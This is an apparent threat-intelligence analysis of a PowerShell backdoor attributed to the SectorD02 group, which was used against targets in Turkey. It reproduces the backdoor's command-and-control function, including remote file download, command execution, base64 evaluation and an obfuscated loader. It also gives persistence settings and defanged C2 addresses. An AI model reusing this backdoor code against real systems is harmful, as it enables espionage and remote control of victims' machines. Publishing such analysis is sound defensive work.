SectorD02 PowerShell Backdoor Analysis

Overview

SectorD02 is a state sponsored threat actor group which mainly targets governments and organizations around the Middle East. In this case, the target of this malware was Turkey, although it has been reported that they also sometimes target countries outside of the Middle East. One characteristic of SectorD02 is their incrementally changing PowerShell backdoor.

We came across two of SectorD02’s such backdoors at the end of 2018, and we analyzed these variants then identified them as the group’s PowerShell malware. SectorD02 focuses on using PowerShell scripts to carry out their attacks and loading those scripts past layers of obfuscation through a variety of methods. One such method is via PS2EXE (PowerShell to EXE), and our analysis on public reporting has shown they have used this vector sometimes [1] since their attacks had first been grouped and given a name [2].

PowerShell Backdoor

Both versions of the PS2EXE backdoors we came across end up executing the exact same PowerShell script (which includes the same victim ID), and the main difference seems to be that they were compiled seconds apart and yet having different compiler linker versions.

Hash (SHA-256)Compile TimestampLinker Version
4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd039414.10.2018 09:20:038.0 (.NET 2)
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c14.10.2018 09:20:2010.0 (.NET 4)

This is a strange scenario and seems to indicate that the attacker had likely either introduced build automation into its malware creation process or had more than one employee/machine/environment for creating builds for distribution and did so almost at the same time. However, since SectorD02 is constantly changing their methods of producing malware and the scripts themselves, it does not make any economical sense to automate this in a build and we have not seen evidence of it elsewhere, so the latter is what we believe to be the most likely scenario.

After extracting the encoded PowerShell script from the PS2EXE executable, the first thing we see is some Hebrew text stored in two variables. These same unused variables have been left there in other variants of their backdoor reported by others, but is completely meaningless as the attackers have even left Chinese text in earlier samples [3].

Some of the things we see in this version are:

  • Hiding and setting of system attribute for svchost.html, svchost.zip, and svchosts.exe in the C:\Windows directory. Similar sounding filenames/extensions have been reported being used by this group elsewhere [4], and indicate that there are other pieces of malware used in the same attack we are not yet aware of.
  • First persistence: Standard HKLM run registry key for “WindowsDefender” with the value “c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,”.
  • Second persistence: Scheduled task with the same value as before under “Microsoft\WindowsMapsUpdateInfo”.

Creating the Victim ID

As usual, they follow their mechanism for getting the victim ID using a combination of information taken from the victim machine. This similar kind of mechanism can be seen since early last year [5]. Recently, other researchers found a different version which used “::” as a separator instead of “**” [6], but it is hard to say whether these malware are made by the same group.

$SysInfo = getOS $SysInfo += “**” $SysInfo += getIP $SysInfo += “**” $SysInfo += getArch $SysInfo += “**” $SysInfo += getHostName $SysInfo += “**” $SysInfo += getDomain $SysInfo += “**” $SysInfo += isAdmin $SysInfo += getUsername $SysInfo += “**” $SysInfo += getPIP $global:id = md5generator($SysInfo) return ($global:id + ‘**’ + $SysInfo)

C2 Commands

When the group is not changing their malware functionality, they are constantly at least changing their naming of items in their scripts. In this variant, we can see the commands “upload”, “cmd”, “b64”, and “muddy”.

function command_and_control($cmd){ try{ if($cmd.StartsWith(‘upload’)){ try{ $cmd=$cmd.replace(‘upload ‘,”) $wc = New-Object System.Net.WebClient $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials $wc.DownloadFile($cmd, (“c:\programdata\” + $cmd.Substring($cmd.LastIndexOf(‘/’),$cmd.Length-$cmd.LastIndexOf(‘/’)))) return Eval “pwd” }catch{ return $_.Exception.Message } } elseif($cmd.StartsWith(‘cmd’)){ $cmd=$cmd.replace(‘cmd ‘,”) try{ $out = cmd /c $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘b64’)){ $cmd=$cmd.replace(‘b64 ‘,”) try{ $cmd = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($cmd)) $out = Eval $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘muddy’)){ $cmd=$cmd.replace(‘muddy ‘,”) $cmd = shttpGET($cmd) set-content -path “c:\programdata\LSASS” -value $cmd try{ Start-Process powershell -ArgumentList ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0gMDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs=”))) -WindowStyle Hidden return (Eval “ls c:\programdata”) } catch { return $_.Exception.Message } } else { return Eval $cmd } } catch{ return $_.Exception.Message } }

Random Proxy

This variant has four C2 IP addresses and uses one of them randomly. These IP addresses were used in other attacks around the same time as well [1]. As usual, these C2 servers are likely to be simply hacked servers like as before [7], something acknowledged by the attacker when they refer to their servers as proxies as well.

$C = @(‘hxxp://78[.]129[.]139[.]148′,’hxxp://79[.]106[.]224[.]203′,’hxxp://104[.]237[.]233[.]17′,’hxxp://185[.]34[.]16[.]82’) function getRandomProxy(){ $rnd = Get-Random -minimum 0 -maximum ($C.Length) $global:url = $C[$rnd] }

Interestingly, even at the time of writing, two of the proxy C2 servers (79[.]106[.]224[.]203 and 185[.]34[.]16[.]82) had the “MikroTik bandwidth-test server” on port 2000 enabled and that could have been how the servers got compromised and used as C2 servers.

Summary

SectorD02 is one of those groups which are much harder and complicated to attribute attacks to because attribution based solely/heavily on technical indicators from malware simply does not work. We have talked about this before in our previous post [8] and although this backdoor can be considered a custom malware, it may as well be open source because it is so easy for others to modify these malware and reuse it for their own attacks.

Indicators of Compromise

Hashes (SHA-256)

4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd0394
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c

IPs

78[.]129[.]139[.]148
79[.]106[.]224[.]203
104[.]237[.]233[.]17
185[.]34[.]16[.]82

References

[1] https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
[2] https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east
[3] https://securelist.com/muddywater/88059
[4] https://www.emanueledelucia.net/site/files/2018/10/muddywater.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html
[6] https://blog.trendmicro.com/trendlabs-security-intelligence/new-powershell-based-backdoor-found-in-turkey-strikingly-similar-to-muddywater-tools/
[7] https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/
[8] https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/